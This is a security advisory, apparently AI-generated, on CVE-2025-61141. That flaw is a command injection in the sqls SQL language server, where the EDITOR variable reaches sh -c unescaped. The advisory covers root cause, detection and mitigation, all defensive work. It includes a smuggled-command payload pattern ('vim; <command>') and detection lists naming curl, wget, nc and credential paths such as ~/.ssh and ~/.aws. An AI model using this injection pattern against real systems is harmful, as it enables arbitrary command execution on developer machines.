CVE-2025-61141 Overview
CVE-2025-61141 is a command injection vulnerability in sqls-server/sqls version 0.2.28, an SQL language server written in Go. The flaw resides in the openEditor function, which passes the user-controlled EDITOR environment variable and config file path to sh -c without input sanitization. Attackers can leverage this to execute arbitrary shell commands on the host system through the config command. The vulnerability is categorized under [CWE-77] (Improper Neutralization of Special Elements used in a Command).
Critical Impact
Successful exploitation enables arbitrary command execution in the context of the user running the sqls process, leading to potential system compromise.
Affected Products
- sqls-server/sqls version 0.2.28
- SQL language server deployments using the vulnerable config command
- Editor integrations (LSP clients) invoking sqls with attacker-influenced EDITOR values
Discovery Timeline
- 2025-10-30 - CVE-2025-61141 published to NVD
- 2026-04-15 - Last updated in NVD database
Technical Details for CVE-2025-61141
Vulnerability Analysis
The vulnerability exists in the openEditor function within sqls-server/sqls 0.2.28. When a user invokes the config command, the application constructs a shell command string by concatenating the value of the EDITOR environment variable with the configuration file path. This string is then passed to sh -c for execution.
Because the EDITOR value is interpolated into the shell command without escaping or argument-array execution, shell metacharacters such as ;, &&, |, and backticks are interpreted by the shell. An attacker who can influence the EDITOR variable can inject arbitrary commands that execute under the privileges of the sqls process.
Root Cause
The root cause is improper neutralization of special elements in a command string [CWE-77]. The application chose sh -c execution with string concatenation rather than invoking the editor binary directly via an argument array (for example, Go's exec.Command(editor, path) without a shell). This design pattern treats untrusted environment input as code.
Attack Vector
Exploitation requires the attacker to control or influence the EDITOR environment variable in the process environment of sqls. This can occur in shared development environments, through malicious project-level configuration, container or CI pipeline manipulation, or via social engineering targeting developers. Once the variable is set with a payload such as vim; <command>, invoking the config command triggers command execution. For detailed technical write-ups, see the DW1 Advisory #54 and Lukmanern CVE-2025-61141 Analysis.
Detection Methods for CVE-2025-61141
Indicators of Compromise
- Unexpected child processes spawned by sqls such as sh, bash, curl, wget, or nc.
- EDITOR environment variable values containing shell metacharacters (;, &&, ||, |, backticks, $()).
- Outbound network connections originating from the sqls process to untrusted hosts.
- Modifications to user shell profiles or SSH authorized_keys following sqls config invocations.
Detection Strategies
- Monitor process execution telemetry for sqls parent processes spawning shells or download utilities.
- Inspect process environment data for EDITOR variables containing command separators or substitution syntax.
- Audit command-line arguments for invocations matching sh -c patterns originating from sqls.
Monitoring Recommendations
- Enable detailed process creation logging (Linux auditd execve, macOS Endpoint Security) on developer endpoints running sqls.
- Alert on sqls writing to or reading from sensitive paths such as ~/.ssh/, ~/.aws/, or shell rc files.
- Track installations of sqls binaries at version 0.2.28 across managed endpoints via software inventory.
How to Mitigate CVE-2025-61141
Immediate Actions Required
- Inventory all endpoints and CI runners running sqls-server/sqls 0.2.28 and isolate any that source EDITOR from untrusted contexts.
- Unset or override the EDITOR environment variable to a known-safe binary path before invoking sqls.
- Avoid running the sqls config command until a patched version is installed.
Patch Information
At the time of NVD publication, no fixed version is referenced in the advisory. Monitor the GitHub SQLS Server Repository for upstream commits that replace sh -c invocation with direct argument-array execution, and upgrade once a fixed release is published.
Workarounds
- Set EDITOR to an absolute path to a trusted editor binary (for example, /usr/bin/vim) without any additional arguments or shell metacharacters.
- Run sqls under a least-privileged user account to limit the blast radius of arbitrary command execution.
- Restrict the ability of project-level configuration or dotfiles to modify the EDITOR variable in shared environments.
# Configuration example: enforce a safe EDITOR before invoking sqls
export EDITOR=/usr/bin/vim
unset VISUAL
sqls config
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
